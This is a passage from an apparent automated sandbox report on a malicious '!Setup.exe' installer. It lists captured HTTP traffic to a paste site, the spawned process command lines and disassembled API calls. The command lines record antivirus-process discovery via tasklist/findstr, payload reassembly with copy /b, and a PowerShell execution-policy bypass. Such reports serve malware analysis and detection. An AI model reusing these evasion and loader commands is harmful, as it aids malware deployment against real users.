2024-12-28 20:36:13 UTC	916	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 20:36:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ksakgAAS8ZruHoudo6%2BFZHGKkKElhiLieKavSkkh8b2uZfYUJSfKmBzmuxMsbLbhxt7ECCrlH50pe%2F2UxySPggqddgoj08zd%2BQf6qjjwhOtgPVNDJi6XEWDnJQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94575f2ba3f5fa-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1616&rtt_var=616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=810&delivery_rate=1760096&cwnd=252&unsent_bytes=0&cid=cedea454641f5e66&ts=787&x=0"
2024-12-28 20:36:13 UTC	453	IN	Data Raw: 31 36 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 57 68 61 74 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 77 68 61 74 22 20 2f 3e 0a 0a 20 20 20 20 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 69 73 20 61 20 6d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 Data Ascii: 161a<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>What</title><link rel="canonical" href="https://rentry.co/what" /> <meta name="description" content="Rentry.co is a markdown paste service with preview, custom urls and e
2024-12-28 20:36:13 UTC	1369	IN	Data Raw: 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 Data Ascii: a name="twitter:description" content="Markdown paste service with preview, custom urls and editing." /><meta name="twitter:title" content="Rentry.co - Markdown Paste Service" /><meta name="twitter:site" content="@rentry_co" /><meta name="twitter:image"
2024-12-28 20:36:13 UTC	1369	IN	Data Raw: 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 3d 20 6e 75 6c 6c 20 26 26 20 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 22 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 Data Ascii: m("dark-mode") === null && window.matchMedia("(prefers-color-scheme: dark)").matches \|\| localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry
2024-12-28 20:36:13 UTC	1369	IN	Data Raw: 61 63 63 65 73 73 20 63 6f 64 65 20 61 73 20 61 20 68 65 61 64 65 72 20 69 6e 20 79 6f 75 72 20 72 65 71 75 65 73 74 2c 20 77 68 69 63 68 20 77 69 6c 6c 20 67 69 76 65 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 61 6e 79 20 70 6f 73 74 27 73 20 2f 72 61 77 2f 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 73 79 73 74 65 6d 20 77 61 73 20 61 20 6e 65 63 65 73 73 61 72 79 20 61 64 64 69 74 69 6f 6e 20 64 75 65 20 74 6f 20 65 78 74 65 6e 73 69 76 65 20 6d 69 73 75 73 65 20 62 79 20 62 61 64 20 61 63 74 6f 72 73 20 70 6f 73 74 69 6e 67 20 6d 61 6c 77 61 72 65 20 73 6e 69 70 70 65 74 73 20 61 6e 64 20 67 65 74 74 69 6e 67 20 75 73 20 69 6e 74 6f 20 61 20 6c 6f 74 20 6f 66 20 74 72 6f 75 62 Data Ascii: access code as a header in your request, which will give you access to any post's /raw/ page.</p> <p>This system was a necessary addition due to extensive misuse by bad actors posting malware snippets and getting us into a lot of troub
2024-12-28 20:36:13 UTC	1106	IN	Data Raw: 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c Data Ascii: pt><script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script> </div><script>(function(){function c(){var b=a.contentDocument\|\|a.contentWindow.document;if(b){var d=b.createEl
2024-12-28 20:36:13 UTC	6	IN	Data Raw: 31 0d 0a 0a 0d 0a Data Ascii: 1
2024-12-28 20:36:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:34:58
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\!Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\!Setup.exe"
Imagebase:	0x400000
File size:	14'692'191 bytes
MD5 hash:	CB8F02134E7A9E082E0D9BF4C988B202
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:34:59
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:34:59
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:35:01
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xd20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:35:01
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x160000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:35:02
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xd20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:35:02
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x160000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:35:02
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 71992
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:35:02
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Ec
Imagebase:	0x910000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:35:02
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "Ratio" Returning
Imagebase:	0x160000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:35:03
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:35:03
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:35:03
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
Wow64 process (32bit):	true
Commandline:	Banned.com V
Imagebase:	0x1a0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:35:03
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x300000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:36:12
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\9OMAF2HFFRD0LNMKR.ps1"
Imagebase:	0x990000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	15:36:12
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.9%
Total number of Nodes:	1481
Total number of Limit Nodes:	25

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

{, xrefs: 0040537E
New install of "%s" to "%s", xrefs: 004051AE

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

~nsu.tmp, xrefs: 00403B23
SeShutdownPrivilege, xrefs: 00403C42
NCRC, xrefs: 004039A8
NSIS Error, xrefs: 0040390E
\Temp, xrefs: 00403A47
/D=, xrefs: 004039D2
Error launching installer, xrefs: 00403AA9
_?=, xrefs: 00403A90

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406A7F
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
F, xrefs: 00406858

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
